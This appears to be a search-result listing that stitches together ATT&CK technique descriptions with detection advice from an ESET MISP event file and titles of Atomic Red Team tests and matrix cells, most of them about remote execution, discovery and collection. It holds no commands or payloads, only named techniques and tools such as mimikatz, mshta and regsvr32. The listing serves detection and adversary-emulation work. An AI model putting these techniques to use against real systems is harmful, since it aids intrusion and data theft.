behavior.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: API monitoring, Windows Registry, File monitoring, DLL monitoring, Named Pipes, Process Monitoring\n\nEffective Permissions: User, Administrator, SYSTEM, root\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator, SYSTEM, root\n\nContributors: Anastasios Pingios", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \n\n===Windows===\n\nExample utilities used to obtain this information are <code>dir</code> and <code>tree</code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.\n\n===Mac and Linux===\n\nIn Mac and Linux, this kind of discovery is accomplished with the <code>ls</code>, <code>find</code>, and <code>locate</code> commands.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator, SYSTEM\n\nSystem Requirements: Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nPermissions Required: User, Administrator, SYSTEM", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.\n\n===Windows===\n\nAn example command that would obtain details on processes is \"tasklist\" using the Tasklist utility.\n\n===Mac and Linux===\n\nIn Mac and Linux, this is accomplished with the <code>ps</code> command.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator, SYSTEM\n\nSystem Requirements: Administrator, SYSTEM may provide better process ownership details", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, Process monitoring, Process command-line parameters\n\nPermissions Required: User, Administrator, SYSTEM", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.\n\nAdversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.\n\nDetection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process monitoring, Process command-line parameters\n\nSystem Requirements: Privileges to access certain files and directories", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration.\n\nAdversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.\n\nDetection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process monitoring, Process command-line parameters\n\nSystem Requirements: Privileges to access removable media drive and files", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring\n\nRequires Network: Yes",
malware-ioc gaming_supply_chain.misp_event.json "remote-service-effects"
atomic-red-team index.md - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1074.002 Remote Data Staging CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1114.002 Remote Email Collection CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Scheduled task Remote [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Compiled HTML Help Remote Payload [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: WINWORD Remote Template Injection [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: MSXSL Bypass using remote files [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: WMIC bypass using remote XSL file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1133 External Remote Services MIT License. © 2018 Red Canary
atomic-red-team index.md - T1018 Remote System Discovery MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Remote System Discovery - net [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Remote System Discovery - net group Domain Computers [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Remote System Discovery - nltest [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Remote System Discovery - ping sweep [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Remote System Discovery - arp [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #7: Remote System Discovery - sweep [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #8: Remote System Discovery - nslookup [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Remote System Discovery - adidnsdump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #12: Remote System Discovery - ip neighbour [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #13: Remote System Discovery - ip route [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Use PsExec to execute a command on a remote host [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: WMI Reconnaissance List Remote Services [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: WMI Execute Remote Process [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1210 Exploitation of Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1021.001 Remote Desktop Protocol MIT License. © 2018 Red Canary
atomic-red-team index.md - T1563 Remote Service Session Hijacking CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1021 Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1021.006 Windows Remote Management MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Enable Windows Remote Management [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: rsync remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: rsync remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: scp remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: scp remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: sftp remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: sftp remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1219 Remote Access Software MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1074.002 Remote Data Staging CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1114.002 Remote Email Collection CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1018 Remote System Discovery MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #7: Remote System Discovery - sweep [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #12: Remote System Discovery - ip neighbour [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #13: Remote System Discovery - ip route [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1133 External Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1210 Exploitation of Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1563 Remote Service Session Hijacking CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1021 Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #1: rsync remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: rsync remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: scp remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #4: scp remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #5: sftp remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #6: sftp remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1219 Remote Access Software CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1074.002 Remote Data Staging CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1018 Remote System Discovery MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #7: Remote System Discovery - sweep [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #1: rsync remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #2: rsync remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #3: scp remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #4: scp remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #5: sftp remote file copy (push) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #6: sftp remote file copy (pull) [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1219 Remote Access Software CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1210 Exploitation of Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1563 Remote Service Session Hijacking CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1021 Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1074.002 Remote Data Staging CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1114.002 Remote Email Collection CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Scheduled task Remote [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Compiled HTML Help Remote Payload [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: WINWORD Remote Template Injection [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: MSXSL Bypass using remote files [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: WMIC bypass using remote XSL file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1133 External Remote Services MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1018 Remote System Discovery MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Remote System Discovery - net [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Remote System Discovery - net group Domain Computers [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Remote System Discovery - nltest [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Remote System Discovery - ping sweep [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Remote System Discovery - arp [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #8: Remote System Discovery - nslookup [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Remote System Discovery - adidnsdump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1219 Remote Access Software MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Use PsExec to execute a command on a remote host [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: WMI Reconnaissance List Remote Services [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: WMI Execute Remote Process [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1210 Exploitation of Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1021.001 Remote Desktop Protocol MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1563 Remote Service Session Hijacking CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1021 Remote Services CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1021.006 Windows Remote Management MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Enable Windows Remote Management [windows] MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Compromise Hardware Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | At (Linux) | Application Access Token CONTRIBUTE A TEST | ARP Cache Poisoning CONTRIBUTE A TEST | Browser Bookmark Discovery | Exploitation of Remote Services CONTRIBUTE A TEST | Archive Collected Data CONTRIBUTE A TEST | Data Transfer Size Limits | Asymmetric Cryptography CONTRIBUTE A TEST | Application Exhaustion Flood CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Default Accounts CONTRIBUTE A TEST | Cron | At (Linux) | Cloud Accounts | Build Image on Host CONTRIBUTE A TEST | Cloud Instance Metadata API CONTRIBUTE A TEST | Cloud Infrastructure Discovery CONTRIBUTE A TEST | Remote Service Session Hijacking CONTRIBUTE A TEST | Archive via Utility | Exfiltration Over Bluetooth CONTRIBUTE A TEST | Communication Through Removable Media CONTRIBUTE A TEST | Data Encrypted for Impact | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Domain Accounts CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Container Orchestration Job | Clear Command History | Container API | Cloud Service Dashboard CONTRIBUTE A TEST | Remote Services CONTRIBUTE A TEST | Audio Capture CONTRIBUTE A TEST | Exfiltration Over C2 Channel CONTRIBUTE A TEST | DNS CONTRIBUTE A TEST | Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | External Remote Services CONTRIBUTE A TEST | JavaScript CONTRIBUTE A TEST | Browser Extensions | Default Accounts CONTRIBUTE A TEST | Compile After Delivery | Credentials from Password Stores CONTRIBUTE A TEST | Domain Account CONTRIBUTE A TEST | Software Deployment Tools CONTRIBUTE A TEST | Confluence CONTRIBUTE A TEST | Exfiltration Over Symmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Data Obfuscation CONTRIBUTE A TEST | Disk Content Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | User Execution CONTRIBUTE A TEST | Exchange Email Delegate Permissions CONTRIBUTE A TEST | Ptrace System Calls CONTRIBUTE A TEST | Domain Policy Modification CONTRIBUTE A TEST | Password Managers CONTRIBUTE A TEST | Remote System Discovery | | Man-in-the-Middle CONTRIBUTE A TEST | | Mail Protocols CONTRIBUTE A TEST | Service Exhaustion Flood CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | Visual Basic CONTRIBUTE A TEST | External Remote Services CONTRIBUTE A TEST | RC Scripts | Domain Trust Modification | Password Spraying | Security Software Discovery | | Network Device Configuration Dump CONTRIBUTE A TEST | | Multi-Stage Channels CONTRIBUTE A TEST | Service Stop CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Hijack Execution Flow CONTRIBUTE A TEST | Scheduled Task/Job CONTRIBUTE A TEST | Downgrade System Image CONTRIBUTE A TEST | Pluggable Authentication Modules | Software Discovery CONTRIBUTE A TEST | | Remote Data Staging CONTRIBUTE A TEST | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Implant Internal Image CONTRIBUTE A TEST | Setuid and Setgid | Dynamic Linker Hijacking | Private Keys | System Checks | | Remote Email Collection CONTRIBUTE A TEST | | Multiband Communication CONTRIBUTE A TEST | System Shutdown/Reboot | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Outlook Forms CONTRIBUTE A TEST | | Hijack Execution Flow CONTRIBUTE A TEST | Web Portal Capture CONTRIBUTE A TEST | | | | | Remote Access Software CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | Compromise Hardware Supply Chain CONTRIBUTE A TEST | AppleScript | Account Manipulation CONTRIBUTE A TEST | Abuse Elevation Control Mechanism CONTRIBUTE A TEST | Abuse Elevation Control Mechanism CONTRIBUTE A TEST | ARP Cache Poisoning CONTRIBUTE A TEST | Account Discovery CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | ARP Cache Poisoning CONTRIBUTE A TEST | Automated Exfiltration CONTRIBUTE A TEST | Application Layer Protocol CONTRIBUTE A TEST | Account Access Removal CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | Default Accounts CONTRIBUTE A TEST | Exploitation for Client Execution CONTRIBUTE A TEST | Browser Extensions | Create or Modify System Process CONTRIBUTE A TEST | Clear Linux or Mac System Logs | Credential Stuffing | Domain Account CONTRIBUTE A TEST | Remote Service Session Hijacking CONTRIBUTE A TEST | Archive via Library CONTRIBUTE A TEST | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Commonly Used Port CONTRIBUTE A TEST | Data Destruction | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | Domain Accounts CONTRIBUTE A TEST | Graphical User Interface CONTRIBUTE A TEST | Compromise Client Software Binary CONTRIBUTE A TEST | Cron | Code Signing CONTRIBUTE A TEST | Credentials In Files | Domain Groups CONTRIBUTE A TEST | Remote Services CONTRIBUTE A TEST | Archive via Utility | Exfiltration Over Bluetooth CONTRIBUTE A TEST | Communication Through Removable Media CONTRIBUTE A TEST | Data Encrypted for Impact CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | | System Services CONTRIBUTE A TEST | Kernel Modules and Extensions CONTRIBUTE A TEST | Launch Agent | Execution Guardrails CONTRIBUTE A TEST | OS Credential Dumping CONTRIBUTE A TEST | Remote System Discovery | | Local Data Staging | | Fast Flux DNS CONTRIBUTE A TEST | Network Denial of Service CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | | User Execution CONTRIBUTE A TEST | Launch Agent | Launchd | File Deletion | Password Guessing CONTRIBUTE A TEST | Software Discovery | | Remote Data Staging CONTRIBUTE A TEST | | Ingress Tool Transfer | Reflection Amplification CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | | | Server Software Component CONTRIBUTE A TEST | | Invalid Code Signature CONTRIBUTE A TEST | | | | | | Remote Access Software CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | Compromise Software Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | Active Setup CONTRIBUTE A TEST | Asynchronous Procedure Call | Bash History | Cloud Account CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Library | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Commonly Used Port CONTRIBUTE A TEST | Data Destruction | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | External Remote Services | Cron | Application Shimming | At (Linux) | Bypass User Account Control | Credential API Hooking | Container and Resource Discovery CONTRIBUTE A TEST | RDP Hijacking | Confluence CONTRIBUTE A TEST | Exfiltration Over Symmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Data Obfuscation CONTRIBUTE A TEST | Disk Content Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | Hardware Additions CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | At (Linux) | At (Windows) | CMSTP | Credential Stuffing | Domain Account | Remote Desktop Protocol | Credential API Hooking | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Dead Drop Resolver CONTRIBUTE A TEST | Disk Structure Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | Local Accounts | Dynamic Data Exchange | At (Windows) | Authentication Package | COR_PROFILER | Credentials In Files | Domain Groups | Remote Service Session Hijacking CONTRIBUTE A TEST | Data Staged CONTRIBUTE A TEST | Exfiltration Over Web Service | Domain Fronting CONTRIBUTE A TEST | Disk Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | Phishing CONTRIBUTE A TEST | Exploitation for Client Execution CONTRIBUTE A TEST | Authentication Package | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Clear Command History | Credentials from Password Stores | Domain Trust Discovery | Remote Services CONTRIBUTE A TEST | Data from Cloud Storage Object CONTRIBUTE A TEST | Exfiltration over USB CONTRIBUTE A TEST | Domain Generation Algorithms CONTRIBUTE A TEST | Endpoint Denial of Service CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | PowerShell | Component Object Model Hijacking | DLL Search Order Hijacking | Create Process with Token | Input Capture CONTRIBUTE A TEST | Permission Groups Discovery CONTRIBUTE A TEST | Windows Remote Management | LLMNR/NBT-NS Poisoning and SMB Relay | | Multi-Stage Channels CONTRIBUTE A TEST | Service Stop | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Scheduled Task/Job CONTRIBUTE A TEST | Create Account CONTRIBUTE A TEST | Domain Accounts CONTRIBUTE A TEST | DLL Side-Loading | Keylogging | Remote System Discovery | | Man in the Browser CONTRIBUTE A TEST | | Non-Application Layer Protocol | Transmitted Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Shared Modules CONTRIBUTE A TEST | DLL Search Order Hijacking | Dylib Hijacking CONTRIBUTE A TEST | Deobfuscate/Decode Files or Information | LSASS Memory | System Checks | | Remote Data Staging CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Software Deployment Tools | DLL Side-Loading | Dynamic Linker Hijacking | Deploy Container CONTRIBUTE A TEST | Man-in-the-Middle CONTRIBUTE A TEST | System Information Discovery | | Remote Email Collection CONTRIBUTE A TEST | | Port Knocking CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Unix Shell | Domain Controller Authentication CONTRIBUTE A TEST | Escape to Host | Disable Windows Event Logging | Network Sniffing | System Owner/User Discovery | | Video Capture | | Remote Access Software | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | External Remote Services | Image File Execution Options Injection | Domain Trust Modification | Pluggable Authentication Modules | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | Compromise Software Supply Chain CONTRIBUTE A TEST | Component Object Model CONTRIBUTE A TEST | Active Setup CONTRIBUTE A TEST | Accessibility Features | Asynchronous Procedure Call | Brute Force CONTRIBUTE A TEST | Browser Bookmark Discovery | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Custom Method CONTRIBUTE A TEST | Exfiltration Over Alternative Protocol | Bidirectional Communication CONTRIBUTE A TEST | Application or System Exploitation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | External Remote Services | Inter-Process Communication CONTRIBUTE A TEST | At (Windows) | Asynchronous Procedure Call | CMSTP | Credentials from Password Stores | File and Directory Discovery | RDP Hijacking | Clipboard Data | Exfiltration Over Physical Medium CONTRIBUTE A TEST | Data Encoding CONTRIBUTE A TEST | Direct Network Flood CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
